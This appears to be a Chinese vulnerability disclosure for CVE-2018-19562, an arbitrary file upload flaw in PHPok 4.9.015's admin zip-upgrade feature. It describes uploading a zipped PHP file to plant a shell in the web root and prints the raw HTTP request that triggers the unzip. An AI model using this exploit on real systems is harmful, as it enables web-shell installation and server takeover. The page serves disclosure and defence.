CVE中文申请站

一、漏洞摘要

漏洞名称: PHPok 4.9.015存在任意文件上传漏洞
上报日期: 2018-11-25
漏洞发现者: F0rmat
产品首页: https://www.phpok.com/
软件链接: https://www.phpok.com/24489.html
版本: 4.9.015
CVE编号: CVE-2018-19562


二、漏洞概述

该漏洞存在于“登录后台>程序升级->压缩包升级”
1.png
编辑一个测试文件phpinfo.php,压缩为phpinfo.zip上传。
2.png
把shell生成在主目录下面
3.png

三、利用代码

exp代码如下:
解压文件操作如下。

GET /admin.php?c=update&f=unzip&zipfile=_cache%2F8c9ae663e9d6ce4f.zip&_=1533515826187 HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
request_type: ajax
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
Referer: http://127.0.0.1/admin.php?c=update&f=zip
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: hd_sid=aZY7Qf; hd_auth=f0c7B2JXp7hhumOhqeqELbZ5FJA3C%2FW2AKt4di3duYf1l5T%2BbkCMPFkWus2WrHfUg2Z8np8oM4VygPGWolgu; PHPSESSION=h4l9gblfbhu85v6sl543egc5d1
Connection: close


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/87/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19562
exploit-db:发布中

标签: PHPok, 任意文件上传